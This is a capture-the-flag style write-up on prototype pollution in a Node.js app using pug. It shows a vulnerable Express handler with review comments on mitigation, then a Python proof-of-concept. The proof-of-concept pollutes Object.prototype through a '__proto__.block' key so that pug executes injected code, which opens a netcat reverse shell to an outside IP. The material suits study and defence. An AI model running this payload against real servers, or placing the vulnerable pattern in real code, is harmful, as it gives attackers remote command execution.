Introduction
Prototype Pollution is a vulnerability in which attacker-controlled input modifies the prototype of an object (typically `Object.prototype`), so that the injected properties are inherited by every object in the application. Depending on how the application or its libraries use those inherited properties, this can be escalated to remote code execution on the server.
Try it yourself
The challenge is based on the following vulnerable handler:
const pug = require('pug');
...
// Vulnerable handler as presented in the write-up. The raw request body is
// handed to unflatten(), which turns dotted keys into nested objects. A key
// path that begins with `__proto__` is therefore written onto
// Object.prototype instead of onto the request's own object, and every
// object in the process inherits it from then on.
router.post('/api/submit', (req, res) => {
  // req.body is entirely untrusted. unflatten() is not shown on this page, so
  // whether it filters `__proto__` / `constructor` / `prototype` keys cannot be
  // confirmed here; the exploit on this page indicates that it does not.
  // Mitigation: reject or strip those keys before unflattening, and freeze
  // Object.prototype as defence in depth.
  const { artist } = unflatten(req.body);
  // No check that `artist` exists or that `artist.name` is a string: a body
  // without an artist.name key makes this line throw a TypeError.
  if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
    return res.json({
      // The template text is static, so the compile itself is not injectable
      // through `user`. The exploit on this page instead relies on
      // pug.compile() reading a `block` property it never set, which now
      // resolves through the polluted prototype — the user-controlled data
      // reaches the compiler indirectly, not via this string.
      'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
    });
  } else {
    return res.json({
      'response': 'Please provide us with the full name of an existing member.'
    });
  }
});
Exploit code (proof of concept used against the challenge):
import requests
TARGET_URL = 'http://127.0.0.1:1337'
# make pollution
# The flattened JSON body below is exactly what the vulnerable handler feeds
# to unflatten(). The first key is the legitimate field the handler expects;
# the second uses a `__proto__` path, which a safe unflatten() must reject
# rather than assign. On the wire this is an ordinary JSON POST, so detection
# has to inspect key names (`__proto__`, `constructor`, `prototype`) in the
# body rather than anything about the transport.
r = requests.post(TARGET_URL + '/api/submit', json = {
    "artist.name": "Haigh",  #This is the value that is being set to the artist.name
    # Polluted property: the page's author reports that pug's compiler picks
    # up this `block` object from the prototype when the template is compiled,
    # so the string under `line` ends up executed on the server. From the
    # defender's side, the outbound connection from the web server to a
    # non-local host/port is the observable sign of success.
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync(`sh -c 'nc 172.20.10.4 9001 -e sh'`)"
    }
})
# NOTE(review): the response in `r` is never inspected; the script assumes
# success without checking status or body.